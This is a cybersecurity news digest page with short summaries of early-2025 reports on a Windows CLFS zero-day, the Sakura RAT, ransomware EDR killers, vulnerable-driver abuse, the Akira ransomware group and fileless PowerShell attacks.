We value your privacy

We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By clicking "Accept All", you consent to our use of cookies.

Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

NewApp Digest
search bot

EDR

Microsoft fixes actively exploited Windows CLFS zero-day (CVE-2025-29824)
Winsage
April 8, 2025

Microsoft fixes actively exploited Windows CLFS zero-day (CVE-2025-29824)

April 2025 Patch Tuesday introduced fixes for over 120 vulnerabilities, including a critical zero-day vulnerability (CVE-2025-29824) that is actively exploited. CVE-2025-29824 is a user-after-free vulnerability in the Windows Common Log File System (CLFS), allowing privilege escalation to SYSTEM on compromised Windows machines. Microsoft has patched 32 CLFS vulnerabilities since 2022, with six exploited in the wild. Updates for Windows 10 are not yet available. Other notable vulnerabilities include CVE-2025-26663 and CVE-2025-26670, both unauthenticated user-after-free vulnerabilities in Windows LDAP, and CVE-2025-27480 and CVE-2025-27482 in Windows Remote Desktop Services. None of these vulnerabilities have been patched for Windows 10 systems, but updates are forthcoming. Microsoft reversed its decision to discontinue driver update synchronization to WSUS servers, confirming that WSUS will continue to synchronize driver updates.
Sakura RAT Released on GitHub Can Bypass Antivirus and EDR Tools
Tech Optimizer
April 7, 2025

Sakura RAT Released on GitHub Can Bypass Antivirus and EDR Tools

Sakura RAT is a newly developed remote administration tool available on GitHub, designed for use by malware analysts and security researchers. It features capabilities such as hidden browsing, hidden virtual network computing (HVNC), fileless execution, multi-session control, and anti-detection mechanisms to evade antivirus and endpoint detection systems. While marketed for research purposes, its open availability raises concerns about potential misuse by cybercriminals for activities like data exfiltration and ransomware deployment. Cybersecurity experts are advocating for the removal of the repository from GitHub and calling for improved detection systems to combat the risks posed by such advanced tools.
Traditional EDR can't keep up with modern cyber threats
Tech Optimizer
March 31, 2025

Traditional EDR can’t keep up with modern cyber threats

By 2025, the global cost of cybercrime is projected to reach .5 trillion annually. Many organizations continue to use outdated Endpoint Detection and Response (EDR) solutions, which are increasingly ineffective against sophisticated cyber threats. EDR was introduced in 2013 but has struggled to keep pace with evolving attack techniques. Traditional EDR is reactive, responding to incidents after they occur, and relies on known Indicators of Compromise (IoCs), which limits its effectiveness. Real-world examples of traditional EDR failures include a misconfigured update to CrowdStrike’s Falcon EDR causing an IT outage, the Akira ransomware exploiting an unsecured webcam, the Medibank breach despite multiple alerts from EDR, and the BlackCat ransomware attack on Henry Schein. These incidents highlight the inadequacy of traditional EDR in preventing modern threats. The next phase of endpoint security is Preemptive Endpoint Protection (PEP), which actively prevents attacks rather than just detecting and responding to them. PEP utilizes proactive strategies like Automated Moving Target Defense (AMTD) and Adaptive Exposure Management (AEM), and research indicates that organizations using proactive security save 30% more on breach costs compared to those relying solely on reactive measures.
Ransomware crews add EDR killers to their arsenal
Tech Optimizer
March 31, 2025

Ransomware crews add EDR killers to their arsenal

Antivirus and endpoint security tools are increasingly challenged by ransomware groups that use sophisticated strategies to disable defenses early in attacks. Cisco Talos reported that in nearly half of the ransomware incidents they handled in 2024, attackers successfully employed "EDR killers" to neutralize endpoint detection and response (EDR) systems, achieving success 48 percent of the time. Tools such as EDRSilencer, EDRSandblast, EDRKillShifter, and Terminator pose significant threats to organizational security. EDRKillShifter exploits vulnerable drivers on Windows machines to terminate EDR products, a tactic observed in operations by rival gangs like Medusa, BianLian, and Play. The primary goal of these tools is to disable EDR protections, allowing attackers to operate undetected, complicating system recovery efforts. Recovery often requires wiping and rebuilding entire networks if robust backups are available. Some EDR killers, like HRSword, are legitimate software tools misused by ransomware actors to disable endpoint protection systems. Attackers have exploited misconfigured systems, particularly EDR products set to audit-only mode, which detect but do not block malicious activity. LockBit has remained the most active ransomware-as-a-service group for the third consecutive year, accounting for 16 percent of claimed attacks in 2024. Newcomer RansomHub secured the second position with 11 percent of posts to leak sites. The effectiveness of law enforcement actions plays a significant role in shaping the ransomware landscape.
Top 10 Best EDR Solutions (Endpoint Detection & Response) In 2025
Tech Optimizer
March 23, 2025

Top 10 Best EDR Solutions (Endpoint Detection & Response) In 2025

By 2025, the market for Endpoint Detection and Response (EDR) solutions is expected to feature several notable products, including: 1. Trend Micro: Offers advanced endpoint protection and threat detection with XDR features for real-time monitoring. 2. SentinelOne: Provides autonomous endpoint protection with AI-driven threat detection and customizable EDR solutions. 3. Cynet: Features an all-in-one cybersecurity platform with extensive threat coverage and ease of deployment. 4. Check Point: Delivers enterprise-class endpoint protection with advanced threat prevention and full disk encryption. 5. CrowdStrike: Focuses on real-time threat detection and machine learning-based malware identification. 6. Palo Alto Networks: Enhances threat detection and response capabilities with advanced analytics and machine learning. 7. BlackBerry Cylance: Utilizes AI and machine learning for threat detection and remediation, focusing on behavior analysis. 8. VMware Carbon Black: Offers a cloud-based solution leveraging machine learning for comprehensive threat detection and incident response. 9. Broadcom Symantec: Provides rapid threat detection and remediation with multi-layered malware protection and global threat intelligence. 10. Cisco: Known for comprehensive protection and real-time threat monitoring, preventing malware and identifying sophisticated threats.
Cybercriminals Exploit CheckPoint Driver Flaws in Malicious Campaign
Tech Optimizer
March 21, 2025

Cybercriminals Exploit CheckPoint Driver Flaws in Malicious Campaign

A report by Nima Bagheri reveals that CheckPoint’s ZoneAlarm antivirus software is being exploited by threat actors using a method called Bring Your Own Vulnerable Driver (BYOVD). This attack targets vulnerabilities in the vsdatant.sys driver, which operates with high-level kernel privileges, allowing attackers to bypass Windows security measures. Specifically, version 14.1.32.0 of vsdatant.sys, released in 2016, contains vulnerabilities that enable attackers to circumvent the Windows Memory Integrity feature, gaining access to sensitive information and establishing persistent connections to compromised systems. Bagheri advises users to update to the latest version of vsdatant.sys, which is not vulnerable. CheckPoint confirmed that the outdated driver is no longer in use and that users running the latest versions of ZoneAlarm or Harmony Endpoint are not affected.
Akira Ransomware Targets Windows Servers via RDP and Evades EDR with Webcam Trick
Winsage
March 7, 2025

Akira Ransomware Targets Windows Servers via RDP and Evades EDR with Webcam Trick

The Akira ransomware group has demonstrated its ability to bypass Endpoint Detection and Response (EDR) tools by exploiting an unsecured webcam. In 2024, Akira was responsible for 15% of ransomware incidents addressed by the S-RM team. The group typically gains access through remote access solutions and uses tools like AnyDesk.exe. In a recent attempt to deploy ransomware on a Windows server, their initial effort was thwarted by EDR detection. Subsequently, they conducted an internal network scan and targeted a vulnerable webcam, which lacked EDR protection. By compromising the webcam, Akira deployed Linux-based ransomware to encrypt files across the victim’s network. This incident highlights the need for organizations to patch and manage IoT devices, audit networks for vulnerabilities, implement network segmentation, and monitor IoT traffic for anomalies.
Hackers Using PowerShell and Microsoft Legitimate Apps to Deploy Malware
Tech Optimizer
March 3, 2025

Hackers Using PowerShell and Microsoft Legitimate Apps to Deploy Malware

Cybersecurity experts are reporting an increase in fileless attacks, where cybercriminals use PowerShell and legitimate Microsoft applications to deploy malware with minimal traces. These attacks have existed for over twenty years and are effective at evading traditional antivirus solutions. Attackers exploit PowerShell to download and execute malicious payloads directly in memory, complicating detection. They also utilize LOLBAS techniques, manipulating legitimate applications like BITS to execute malware. Memory injection techniques, such as Process Hollowing, allow attackers to disguise malware as legitimate processes. To combat these threats, cybersecurity professionals recommend deploying Endpoint Detection and Response solutions, enhancing memory analysis, enabling comprehensive PowerShell logging, and implementing PowerShell Constrained Language Mode. Organizations should also monitor Active Directory and conduct regular vulnerability assessments. Traditional file-based security measures are inadequate against these evolving threats, necessitating a shift to behavior-based detection and robust monitoring.
New Malware Uses Legitimate Antivirus Driver to Bypass All System Protections
Tech Optimizer
February 27, 2025

New Malware Uses Legitimate Antivirus Driver to Bypass All System Protections

Cybersecurity researchers at Trellix have identified a malware campaign utilizing a legitimate antivirus driver, specifically the Avast Anti-Rootkit driver (aswArPot.sys), to gain kernel-level access and bypass security protocols. The malware, named “kill-floor.exe,” deploys the Avast driver as a file called “ntfs.bin” and registers it as a service using the Service Control utility (sc.exe) to obtain unrestricted privileges. It monitors active processes and terminates security-related processes by communicating with the Avast driver through the DeviceIoControl API. The malware exploits kernel-mode capabilities to execute actions that dismantle system defenses. Organizations are advised to implement BYOVD protection strategies, including detection rules for vulnerable drivers. Key indicators associated with this campaign include the MD5 hashes: 40439f39f0195c9c7a3b519554afd17a (kill-floor.exe) and a179c4093d05a3e1ee73f6ff07f994aa (ntfs.bin).
Search